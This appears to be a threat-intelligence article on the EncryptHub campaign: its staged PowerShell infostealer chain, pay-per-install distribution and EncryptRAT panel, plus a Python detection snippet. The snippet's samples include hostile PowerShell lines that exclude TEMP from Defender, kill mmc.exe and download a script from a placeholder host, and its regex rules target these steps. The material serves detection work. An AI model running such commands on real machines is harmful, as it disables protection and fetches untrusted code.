EncryptHub’s attack chain
The initial PowerShell script would download the file payload.ps1, which extracted sensitive data from the victim machine, including cryptocurrency wallet, password manager, VPN session, system and cookie information, and exfiltrated it to the attacker's server.

Payload.ps1 would then download and execute another script, runner.ps1, which led to the installation and running of two Microsoft Common Console Document (.msc) files. Running these files installed an HTML loader that executed three more PowerShell commands: one excluded the TEMP folder from Windows Defender scans, one terminated the Microsoft Management Console (mmc.exe) process that had been launched when the .msc files were opened, and one downloaded the file ram.ps1.

Ram.ps1 runs in the final stage of the attack chain, launching the Rhadamanthys infostealer. EncryptHub, which is also tracked as LARVA-208, has also been observed by other researchers delivering additional malware, including Stealc and Fickle Stealer, in its campaigns, according to a report by PRODAFT.
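The loader stage above is the most detectable part of the chain, because all three actions leave traces in PowerShell script-block logging (Event ID 4104) or process command lines. The following Python snippet is an added illustration, not code from the KrakenLabs report or from EncryptHub's tooling: it runs a small rule set over constructed script-block texts and reports whether a single host has shown every stage of the loader. The cmdlets each rule looks for (Add-MpPreference for the Defender exclusion, Stop-Process or taskkill for ending mmc.exe, Invoke-WebRequest, DownloadString and similar for the .ps1 fetch) are assumptions about how those behaviours are usually expressed; the report does not quote the actor's exact commands.

```python
import re

# Constructed sample PowerShell script-block texts, of the kind a defender
# would pull from Event ID 4104 (Microsoft-Windows-PowerShell/Operational).
# Illustrative only; these are not captured EncryptHub samples.
SAMPLE_SCRIPT_BLOCKS = [
    "Add-MpPreference -ExclusionPath $env:TEMP",
    "Add-MpPreference -ExclusionPath 'C:\\Users\\victim\\AppData\\Local\\Temp'",
    "Get-Process mmc | Stop-Process -Force",
    "Invoke-WebRequest -Uri http://example.invalid/ram.ps1 -OutFile $env:TEMP\\ram.ps1",
    "Get-ChildItem C:\\Users",
]

# One rule per action described in the loader stage. The cmdlet spellings are
# assumptions about how the behaviour would be expressed, not the actor's
# exact commands; extend the alternations as you see other variants.
RULES = {
    # Defender exclusion that covers the user's TEMP directory in any common spelling
    "defender_exclusion_temp": re.compile(
        r"Add-MpPreference\s+-ExclusionPath\s+[^\r\n]*?(?:\$env:TEMP|%TEMP%|\\Temp\b)", re.I),
    # Termination of the Microsoft Management Console process
    "kill_mmc": re.compile(
        r"(?:Stop-Process[^\r\n]*\bmmc\b|Get-Process\s+mmc\b[^\r\n]*Stop-Process|taskkill[^\r\n]*mmc\.exe)", re.I),
    # Download of a further PowerShell script
    "download_ps1": re.compile(
        r"(?:Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer)[^\r\n]*\.ps1\b", re.I),
}


def classify(script_block):
    """Return the sorted names of the rules that fire on one script block."""
    return sorted(name for name, rx in RULES.items() if rx.search(script_block))


def chain_hits(script_blocks):
    """Union of rule hits across one host's script blocks, plus whether every loader stage fired."""
    hits = set()
    for block in script_blocks:
        hits.update(classify(block))
    return hits, hits == set(RULES)


if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        print(f"{classify(block) or ['-']}\t{block}")
    hits, full_chain = chain_hits(SAMPLE_SCRIPT_BLOCKS)
    print("stages seen:", sorted(hits), "| full loader chain:", full_chain)
```

Any single rule will fire on legitimate administration now and then; the value is in seeing all three on the same host in a short window, which is why chain_hits reports the combination rather than individual matches. The same patterns can be pointed at Sysmon Event ID 1 command lines. Independently of logging, `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` lists the Defender exclusions currently in force on a host, so an unexplained TEMP entry is a quick triage check.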
EncryptHub uses broker for malware distribution, works on EncryptRAT C2 panel
Another detail about EncryptHub's operations revealed by KrakenLabs is its use of a third-party pay-per-install (PPI) broker called LabInstalls to help spread its malware. LabInstalls automates the distribution of malicious files, including executables (.exe) and PowerShell scripts (.ps1), and charges by the number of installations, from $10 for 100 installs to $450 for 10,000 installs.

The researchers noted that EncryptHub has been using LabInstalls since at least January 2025, as evidenced by a positive review EncryptHub left for the service on the cybercrime forum XSS. Cybercriminals use such PPI broker services to disseminate malware more rapidly and to better obscure the origin of their campaigns, KrakenLabs noted.

EncryptHub was also found to be working on its own project, EncryptRAT, described as a command-and-control (C2) panel that lets operators manage active malware infections, send remote commands, monitor logs from infected devices, and configure malware samples and exfiltration channels.

EncryptHub is believed to be using the tool to manage its own campaigns at present, with potential plans to offer it for sale to other threat actors in the future. The prospect of commercialization is suggested by recent updates to the panel that added support for multiple users and that tie different users to different malware samples.

EncryptHub continues to develop EncryptRAT and refine its overall tactics. Defenders should keep monitoring for EncryptHub indicators of compromise (IOCs) and reduce the risk of infection by ensuring that applications are installed only from legitimate sources.